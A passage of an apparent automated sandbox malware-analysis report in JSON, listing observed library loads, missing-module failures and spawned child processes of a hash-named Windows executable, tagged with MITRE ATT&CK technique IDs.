\"pthnb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005896)\n \"pthnb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005896)\n \"pthnb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005896)\n \"pthnb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005896)\n \"pthnb.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00005896)\n \"pthnb.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005896)\n \"pthnb.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005896)\n \"pdrvn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005976)\n \"pdrvn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005976)\n \"pdrvn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005976)\n \"pdrvn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005976)\n \"xjdpttx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004296)\n \"xjdpttx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004296)\n \"xjdpttx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004296)\n \"xjdpttx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004296)\n \"06462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002968)\n \"06462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002968)\n \"06462.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002968)\n \"06462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002968)\n \"06462.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00002968)\n \"06462.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00002968)\n \"06462.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002968)\n \"2688428.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003800)\n \"2688428.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003800)\n \"2688428.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003800)\n \"2688428.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003800)\n \"642824.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004012)\n \"642824.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004012)\n \"642824.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004012)\n \"642824.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004012)\n \"642824.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00004012)\n \"642824.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004012)\n \"642824.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004012)\n \"642824.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004012)\n \"rjjxrvl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004264)\n \"rjjxrvl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004264)\n \"rjjxrvl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004264)\n \"rjjxrvl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004264)\n \"lvvjfph.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003784)\n \"lvvjfph.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003784)\n \"lvvjfph.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003784)\n \"lvvjfph.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003784)\n \"drlrf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001168)\n \"drlrf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001168)\n \"drlrf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001168)\n \"drlrf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001168)\n \"xdhfnxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003512)\n \"xdhfnxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003512)\n \"xdhfnxr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003512)\n \"xdhfnxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003512)\n \"drjtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003636)\n \"drjtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003636)\n \"drjtt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003636)\n \"drjtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003636)\n \"6886668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002868)\n \"6886668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002868)\n \"6886668.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002868)\n \"6886668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002868)\n \"42042.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002472)\n \"42042.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002472)\n \"42042.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002472)\n \"42042.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002472)\n \"thpxfjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003780)\n \"thpxfjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003780)\n \"thpxfjv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003780)\n \"thpxfjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003780)\n \"fnnxblt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002240)\n \"fnnxblt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002240)\n \"fnnxblt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002240)\n \"fnnxblt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002240)\n \"64268.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004048)\n \"64268.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004048)\n \"64268.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004048)\n \"62440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003628)\n \"62440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003628)\n \"62440.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003628)\n \"62440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003628)\n \"026424.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002604)\n \"026424.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002604)\n \"026424.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002604)\n \"026424.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002604)\n \"xddtpjj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003716)\n \"xddtpjj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003716)\n \"xddtpjj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003716)\n \"xddtpjj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003716)\n \"ndhlfdh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003288)\n \"ndhlfdh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003288)\n \"ndhlfdh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003288)\n \"ndhlfdh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003288)\n \"fjtbx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002332)\n \"fjtbx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002332)\n \"fjtbx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002332)\n \"fjtbx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002332)\n \"64288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003280)\n \"64288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003280)\n \"64288.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003280)\n \"64288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003280)\n \"226448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003240)\n \"226448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003240)\n \"226448.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003240)\n \"226448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003240)\n \"60644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003312)\n \"60644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003312)\n \"60644.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003312)\n \"60644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003312)\n \"44664.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000344)\n \"44664.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000344)\n \"44664.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000344)\n \"44664.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000344)\n \"024668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002680)\n \"024668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002680)\n \"024668.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002680)\n \"024668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002680)\n \"08406.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001828)\n \"08406.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001828)\n \"08406.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001828)\n \"08406.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001828)\n \"062028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000624)\n \"062028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000624)\n \"062028.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000624)\n \"062028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000624)\n \"482480.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004424)\n \"482480.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004424)\n \"482480.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004424)\n \"482480.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004424)\n \"286488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001404)\n \"286488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001404)\n \"286488.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001404)\n \"286488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001404)\n \"26400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002872)\n \"26400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002872)\n \"26400.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002872)\n \"26400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002872)\n \"442444.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003376)\n \"442444.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003376)\n \"442444.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003376)\n \"442444.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003376)\n \"464204.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001668)\n \"464204.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001668)\n \"464204.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001668)\n \"464204.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001668)\n \"82440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003536)\n \"82440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003536)\n \"82440.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003536)\n \"82440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003536)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"620006.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"620006.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lvhxj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lvhxj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pthnb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pthnb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pdrvn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pdrvn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xjdpttx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xjdpttx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"06462.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"06462.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2688428.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2688428.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"642824.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"642824.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rjjxrvl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rjjxrvl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lvvjfph.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lvvjfph.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"drlrf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"drlrf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xdhfnxr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xdhfnxr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"drjtt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"drjtt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6886668.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6886668.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"42042.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"42042.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"thpxfjv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"thpxfjv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fnnxblt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fnnxblt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"62440.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"62440.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"026424.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"026424.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xddtpjj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xddtpjj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ndhlfdh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ndhlfdh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fjtbx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fjtbx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"64288.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"64288.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"226448.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"226448.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"60644.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"60644.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"44664.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"44664.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"024668.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"024668.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"08406.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"08406.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"062028.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"062028.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"482480.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"482480.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"286488.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"286488.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"26400.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"26400.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"442444.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"442444.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"464204.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"464204.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"82440.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"82440.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"620006.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"lvhxj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"pthnb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"00802.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"660202.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"trrtd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"pdrvn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"xjdpttx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"208464.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"82064.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"886408.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"42242.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"848482.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"06462.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"2688428.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"0882288.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"642824.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"rjjxrvl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"pdtrht.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"lvvjfph.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"drlrf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"xdhfnxr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"drjtt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000\n \"6886668.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76730000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"620006.exe\" (UID: 00000000-00005816)\n Spawned process \"lvhxj.exe\" (UID: 00000000-00005952)\n Spawned process \"pthnb.exe\" (UID: 00000000-00005896)\n Spawned process \"00802.exe\" (UID: 00000000-00005868)\n Spawned process \"660202.exe\" (UID: 00000000-00005888)\n Spawned process \"trrtd.exe\" (UID: 00000000-00006132)\n Spawned process \"pdrvn.exe\" (UID: 00000000-00005976)\n Spawned process \"xjdpttx.exe\" (UID: 00000000-00004296)\n Spawned process \"208464.exe\" (UID: 00000000-00006080)\n Spawned process \"82064.exe\" (UID: 00000000-00004116)\n Spawned process \"886408.exe\" (UID: 00000000-00006128)\n Spawned process \"42242.exe\" (UID: 00000000-00006040)\n Spawned process \"848482.exe\" (UID: 00000000-00003792)\n Spawned process \"06462.exe\" (UID: 00000000-00002968)\n Spawned process \"2688428.exe\" (UID: 00000000-00003800)\n Spawned process \"0882288.exe\" (UID: 00000000-00005960)\n Spawned process \"642824.exe\" (UID: 00000000-00004012)\n Spawned process \"rjjxrvl.exe\" (UID: 00000000-00004264)\n Spawned process \"pdtrht.exe\" (UID: 00000000-00003576)\n Spawned process \"lvvjfph.exe\" (UID: 00000000-00003784)\n Spawned process \"drlrf.exe\" (UID: 00000000-00001168)\n Spawned process \"xdhfnxr.exe\" (UID: 00000000-00003512)\n Spawned process \"drjtt.exe\" (UID: 00000000-00003636)\n Spawned process \"6886668.exe\" (UID: 00000000-00002868)\n Spawned process \"42042.exe\" (UID: 00000000-00002472)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"620006.exe\" (UID: 00000000-00005816)\n Spawned process \"lvhxj.exe\" (UID: 00000000-00005952)\n Spawned process \"pthnb.exe\" (UID: 00000000-00005896)\n Spawned 